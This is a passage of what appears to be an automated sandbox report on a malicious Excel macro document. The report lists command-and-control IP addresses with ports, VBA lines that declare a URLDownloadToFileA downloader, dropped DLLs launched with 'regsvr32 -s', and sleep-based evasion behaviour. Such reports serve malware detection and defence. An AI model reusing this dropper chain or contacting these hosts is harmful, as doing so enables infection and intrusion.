Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Jan 2021 15:13:21 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en#0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5t
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000002.00000002.2107200716.0000000001D70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2406809963.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2112116772.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2419749632.0000000000880000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2113665422.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2120190682.0000000001D30000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2114236047.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2124921151.0000000001DF0000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmp String found in binary or memory: https://194.225.58.214/
Source: regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmp String found in binary or memory: https://194.225.58.214/5
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://194.225.58.214/9
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmp String found in binary or memory: https://198.57.200.100/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp String found in binary or memory: https://198.57.200.100:3786/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp String found in binary or memory: https://198.57.200.100:3786/hy;R
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmp String found in binary or memory: https://211.110.44.63/
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://211.110.44.63/h
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://211.110.44.63/~
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://211.110.44.63:5353/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmp String found in binary or memory: https://69.164.207.140/
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://69.164.207.140/q
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: https://69.164.207.140:3388/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp String found in binary or memory: https://69.164.207.140:3388/hy
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49302
Source: unknown Network traffic detected: HTTP traffic on port 49288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown Network traffic detected: HTTP traffic on port 49294 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49260
Source: unknown Network traffic detected: HTTP traffic on port 49246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49279 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49271 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49216
Source: unknown Network traffic detected: HTTP traffic on port 49302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49293 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49257
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49256
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49294
Source: unknown Network traffic detected: HTTP traffic on port 49249 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49293
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49238 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown Network traffic detected: HTTP traffic on port 49244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49246
Source: unknown Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49305 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49288
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49286
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49241
Source: unknown Network traffic detected: HTTP traffic on port 49286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49283
Source: unknown Network traffic detected: HTTP traffic on port 49209 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49283 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49216 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49279
Source: unknown Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49271
Source: unknown Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49270
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown Network traffic detected: HTTP traffic on port 49260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49257 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49309
Source: unknown Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49228
Source: unknown Network traffic detected: HTTP traffic on port 49232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49305

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function mi_1, API Run("forsS_mo") Name: mi_1
Document contains an embedded VBA macro with suspicious strings
Source: printouts of outstanding as of 01_20_2021.xlsm OLE, VBA macro line: Private Declare PtrSafe Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: printouts of outstanding as of 01_20_2021.xlsm OLE, VBA macro line: Private Declare Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Found Excel 4.0 Macro with suspicious formulas
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: CALL
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76D20000 page execute and read and write
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: printouts of outstanding as of 01_20_2021.xlsm OLE, VBA macro line: Private Sub vbox1_cli_Layout()
Source: VBA code instrumentation OLE, VBA macro: Module Sheet1, Function vbox1_cli_Layout Name: vbox1_cli_Layout
Document contains embedded VBA macros
Source: printouts of outstanding as of 01_20_2021.xlsm OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.expl.evad.winXLSM@41/22@7/11
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$printouts of outstanding as of 01_20_2021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE30E.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: printouts of outstanding as of 01_20_2021.xlsm Virustotal: Detection: 24%
Source: printouts of outstanding as of 01_20_2021.xlsm ReversingLabs: Detection: 11%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/media/image2.png
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/media/image3.png
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Registers a DLL
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
Is looking for software installed on the system
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key enumerated: More than 564 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2488 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -372000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -297000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -153000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -495000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -246000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -121000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -247000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -155000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -356000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -334000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -146000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -138000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -353000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -296000s >= -30000s
